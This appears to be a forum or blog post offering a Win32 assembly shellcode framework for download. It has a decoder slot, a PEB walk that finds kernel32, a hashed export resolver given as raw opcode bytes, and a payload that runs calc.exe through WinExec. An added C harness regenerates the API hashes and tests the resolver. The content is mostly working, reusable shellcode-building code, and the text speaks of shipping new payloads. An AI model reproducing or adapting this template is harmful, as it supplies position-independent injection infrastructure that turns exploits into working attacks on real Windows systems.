Main methods:
- Use assembler constants (equ / =) so the assembler, not the author, computes the length of every code section and the EBX-relative offsets between them.
- Keep the framework extensible: the decoder, MyGetKernelBase, MyGetProcAddress, the string area and the payload are separately measured blocks, so any of them can grow without hand-recomputing offsets.
include shellcodecalc.inc

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Code Snippet
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; API Hash Values (hash = ror32(hash, 7) + c over each byte of the name)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; MessageBoxA    1e380a6ah
; LoadLibraryA   0c917432h
; ExitProcess    4fd18963h
; WinExec        1a22f51h

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ShellCode Model Introduction
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Layout of the final blob (top to bottom):
;   +----------------------------------------+
;   | decoder stub        (length unknown)   |  <- everything below it is "encoded"
;   | MyGetKernelBase     (length known)     |
;   | MyGetProcAddress    (length known)     |
;   | strings             (length unknown)   |
;   | shellcode body      (can grow longer)  |
;   +----------------------------------------+
; The body raises the top of the stack, stores the resolved function
; pointers in that frame, and then completes the shellcode's work.

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; SHELLCODE macro definition section
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
DECODE_LEN       equ DecodeEnd - DecodeBegin                      ; length of the decoder stub
ENCODE_LEN       equ ShellcodeEnd - MyGetKernelBegin              ; length of the encoded region
KERNEL_BASE_LEN  equ MyGetKernelEnd - MyGetKernelBegin            ; MyGetKernelBase code length
PROCADDR_LEN     equ MyGetProcAddressEnd - MyGetProcAddressBegin  ; MyGetProcAddress code length
SHELLCODE_LEN    equ ShellcodeEnd - ShellcodeBegin                ; shellcode body length
STRING_LEN       equ string_end - string_begin                    ; string area length

; EBX holds the address right after "call get_eip_1", i.e. DecodeBegin + 5,
; so every EBX-relative offset is the section offset minus 5.
dwGetKernelBase  = DECODE_LEN - 5                                 ; MyGetKernelBase offset from EBX
dwGetProcAddress = DECODE_LEN + KERNEL_BASE_LEN - 5               ; MyGetProcAddress offset from EBX
STACK_LEN        equ 100                                          ; bytes reserved above the stack top

; EBP-relative slots in the raised stack frame
dwKernelBase     = 0h                                             ; kernel32 base
fnWinExec        = 4h                                             ; WinExec pointer
hUser32          = 8h                                             ; user32 handle
fnMessageBox     = 0Ch                                            ; MessageBoxA pointer
fnExitProcess    = 10h                                            ; ExitProcess pointer

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Decoding part
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
DecodeBegin:
    ; reposition: get the current EIP into EBX
    call get_eip_1
get_eip_1:
    pop ebx
    ; decrypt the encoded region here (must not clobber EBX)
    ; jump to the start of the shellcode body
    jmp ShellcodeBegin
DecodeEnd:

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; MyGetKernelBase
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; The bytes below disassemble to:
;   mov eax, fs:[18h]     ; TEB
;   mov eax, [eax+30h]    ; PEB
;   mov eax, [eax+0Ch]    ; PEB_LDR_DATA
;   mov eax, [eax+0Ch]    ; InLoadOrderModuleList.Flink (the .exe itself)
;   mov eax, [eax]        ; next entry: ntdll.dll
;   mov eax, [eax]        ; next entry: kernel32.dll (assumes this load order)
;   mov eax, [eax+18h]    ; DllBase
;   ret
MyGetKernelBegin:
g_fn_GetKernelBase db 064h,0a1h,18h,00h,00h,00h,8bh,40h,30h,8bh,40h,0ch,8bh,40h,0ch
                   db 8bh,00h,8bh,00h,8bh,40h,18h,0c3h
MyGetKernelEnd:

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; MyGetProcAddress
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; stdcall (hModule, dwHash), "ret 8". Walks hModule's export directory
; (e_lfanew at +3Ch, export RVA at PE+78h), hashes every exported name with
; eax = ror(eax,7) + byte, compares with dwHash, looks the index up in
; AddressOfNameOrdinals and AddressOfFunctions and returns the function VA
; in EAX, or 0 if hModule is NULL or no name matches.
MyGetProcAddressBegin:
g_fn_GetProcAddress db 55h,8bh,0ech,56h,53h,51h,83h,7dh,08h,00h,74h,6bh,8bh,75h
                    db 08h,03h,76h,3ch,8dh,76h,78h,8bh,36h,03h,75h,08h,8bh,5eh
                    db 20h,03h,5dh,08h,33h,0c9h,8bh,04h,8bh,03h,45h,08h,51h,8bh
                    db 0d0h,33h,0c0h,8ah,0ah,84h,0c9h,74h,11h,0fh,0beh,0c9h,0c1h
                    db 0c8h,07h,83h,0c2h,01h,03h,0c1h,8ah,0ah,84h,0c9h,75h,0efh
                    db 59h,3bh,45h,0ch,74h,06h,41h,3bh,4eh,18h,72h,0d2h,3bh,4eh,18h
                    db 73h,22h,8bh,5eh,24h,03h,5dh,08h,0fh,0b7h,04h,4bh,3bh,46h
                    db 14h,73h,13h,8bh,5eh,1ch,03h,5dh,08h,8bh,04h,83h,03h,45h
                    db 08h,59h,5bh,5eh,0c9h,0c2h,08h,00h,33h,0c0h,59h,5bh,5eh
                    db 0c9h,0c2h,08h,00h
MyGetProcAddressEnd:

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; String
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
string_begin:
lpCmd    db 'calc.exe', 0
CMD_LEN  = string_end - lpCmd
lpszCmd  = dwGetProcAddress + PROCADDR_LEN      ; string offset from EBX (lpszUser32)
string_end:

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; ShellCode
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ShellcodeBegin:
    ; raise the stack top and set up a frame for the function pointers
    sub  esp, STACK_LEN
    push ebp
    mov  ebp, esp

    ; get the kernel32.dll base address
    lea  eax, [ebx + dwGetKernelBase]
    call eax
    or   eax, eax
    jz   Exit_Shellcode
    mov  dword ptr [ebp + dwKernelBase], eax

    ; walk the export table to get the WinExec address
    push 1a22f51h
    push dword ptr [ebp + dwKernelBase]
    lea  eax, [ebx + dwGetProcAddress]
    call eax
    or   eax, eax
    jz   Exit_Shellcode
    mov  dword ptr [ebp + fnWinExec], eax

    ; pop the calculator: WinExec(lpszCmd, SW_SHOWNORMAL)
    push SW_SHOWNORMAL
    lea  eax, [ebx + lpszCmd]
    push eax
    call dword ptr [ebp + fnWinExec]

Exit_Shellcode:
    ; get the ExitProcess address
    push 4fd18963h
    push dword ptr [ebp + dwKernelBase]
    lea  eax, [ebx + dwGetProcAddress]
    call eax
    or   eax, eax
    jz   ShellcodeEnd
    mov  dword ptr [ebp + fnExitProcess], eax

    ; ExitProcess(0)
    push NULL
    call dword ptr [ebp + fnExitProcess]
ShellcodeEnd:
    nop
    nop
    nop
    nop

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; End
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ShowLen proc
    ; print the section lengths the assembler computed
    invoke crt_printf, l("Decode Len:", 9h, "%d", 0Ah, 0Dh), DECODE_LEN
    invoke crt_printf, l("Encode Len:", 9h, "%d", 0Ah, 0Dh), ENCODE_LEN
    invoke crt_printf, l("GetKernelBase Len:", 9h, "%d", 0Ah, 0Dh), KERNEL_BASE_LEN
    invoke crt_printf, l("GetProcAddress Len:", 9h, "%d", 0Ah, 0Dh), PROCADDR_LEN
    invoke crt_printf, l("ShellCode Len:", 9h, "%d", 0Ah, 0Dh), SHELLCODE_LEN
    ret
ShowLen endp

main proc
    ; invoke ShowLen
    jmp DecodeBegin
main endp
end main
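The two DB blobs above are opaque unless you already know what they encode. The following C program is an added example, not code from the page or its author: it reimplements what the MyGetProcAddress stub does (the ror-7/add name hash and the hand-walked export directory with the same 3Ch/78h/14h/18h/1Ch/20h/24h offsets) so the hash constants listed in the source can be regenerated and the lookup logic exercised. Because it has to run offline, it walks a constructed in-memory mini image rather than a real kernel32.dll; the image layout, export names and RVAs in build_fake_image are assumptions for the demo. On Windows, find_export_by_hash can be pointed at a real module base such as the one MyGetKernelBase returns.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Same hash the stub computes: for each byte, h = ror32(h, 7) + movsx(byte). */
uint32_t api_hash(const char *name)
{
    uint32_t h = 0;
    for (; *name; name++)
        h = ((h >> 7) | (h << 25)) + (uint32_t)(int32_t)(int8_t)*name;
    return h;
}

static uint32_t rd32(const uint8_t *p, uint32_t off) { uint32_t v; memcpy(&v, p + off, 4); return v; }
static uint16_t rd16(const uint8_t *p, uint32_t off) { uint16_t v; memcpy(&v, p + off, 2); return v; }
static void wr32(uint8_t *p, uint32_t off, uint32_t v) { memcpy(p + off, &v, 4); }
static void wr16(uint8_t *p, uint32_t off, uint16_t v) { memcpy(p + off, &v, 2); }

/* Mirrors the stub: base -> e_lfanew (+3Ch) -> export dir RVA at PE+78h,
 * then NumberOfNames (+18h), AddressOfNames (+20h), AddressOfNameOrdinals
 * (+24h), NumberOfFunctions (+14h), AddressOfFunctions (+1Ch).
 * Returns base + function RVA, or 0 on NULL base / no match / bad ordinal,
 * matching the stub's "xor eax,eax" exit. */
uintptr_t find_export_by_hash(const uint8_t *base, uint32_t hash)
{
    if (!base) return 0;
    uint32_t pe     = rd32(base, 0x3C);
    uint32_t exp    = rd32(base, pe + 0x78);
    uint32_t nnames = rd32(base, exp + 0x18);
    uint32_t names  = rd32(base, exp + 0x20);
    for (uint32_t i = 0; i < nnames; i++) {
        if (api_hash((const char *)base + rd32(base, names + i * 4)) != hash)
            continue;
        uint16_t ord = rd16(base, rd32(base, exp + 0x24) + i * 2);
        if (ord >= rd32(base, exp + 0x14)) return 0;
        return (uintptr_t)base + rd32(base, rd32(base, exp + 0x1C) + ord * 4);
    }
    return 0;
}

/* Constructed mini "PE image" (an assumption for the demo, not a real DLL):
 * only the fields the walk above touches are filled in. */
static uint8_t g_img[0x400];
static const char    *g_names[]    = { "ExitProcess", "LoadLibraryA", "WinExec" };
static const uint32_t g_func_rva[] = { 0x1000,        0x2000,         0x3000 };

const uint8_t *build_fake_image(void)
{
    const uint32_t pe = 0x80, exp = 0x200, funcs = 0x240, names = 0x260, ords = 0x280;
    uint32_t s = 0x300;                      /* where the name strings live */
    memset(g_img, 0, sizeof g_img);
    wr32(g_img, 0x3C, pe);                   /* e_lfanew */
    wr32(g_img, pe + 0x78, exp);             /* export directory RVA */
    wr32(g_img, exp + 0x14, 3);              /* NumberOfFunctions */
    wr32(g_img, exp + 0x18, 3);              /* NumberOfNames */
    wr32(g_img, exp + 0x1C, funcs);          /* AddressOfFunctions */
    wr32(g_img, exp + 0x20, names);          /* AddressOfNames */
    wr32(g_img, exp + 0x24, ords);           /* AddressOfNameOrdinals */
    for (uint32_t i = 0; i < 3; i++) {
        wr32(g_img, funcs + i * 4, g_func_rva[i]);
        wr32(g_img, names + i * 4, s);
        wr16(g_img, ords + i * 2, (uint16_t)i);
        strcpy((char *)g_img + s, g_names[i]);
        s += (uint32_t)strlen(g_names[i]) + 1;
    }
    return g_img;
}

/* RVA of the export whose name hashes to `hash` in the fake image, 0 if none. */
uint32_t lookup_rva(uint32_t hash)
{
    const uint8_t *base = build_fake_image();
    uintptr_t p = find_export_by_hash(base, hash);
    return p ? (uint32_t)(p - (uintptr_t)base) : 0;
}

int main(void)
{
    printf("WinExec      %08x\n", api_hash("WinExec"));      /* 01a22f51 */
    printf("ExitProcess  %08x\n", api_hash("ExitProcess"));  /* 4fd18963 */
    printf("WinExec RVA via hash: %#x\n", lookup_rva(0x01a22f51));
    return 0;
}
```

Two things worth checking with this harness before shipping a new payload: that the hash you push matches api_hash of the exact export name (a single-character difference such as WinExec versus winexec changes the value), and that a hash that matches nothing yields 0, since the shellcode body relies on that to fall through to Exit_Shellcode.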
Code:
Link: http://pan.baidu.com/s/1bnGlW1T  Password: o9m7
Shellcode Framework (written in Win32asm)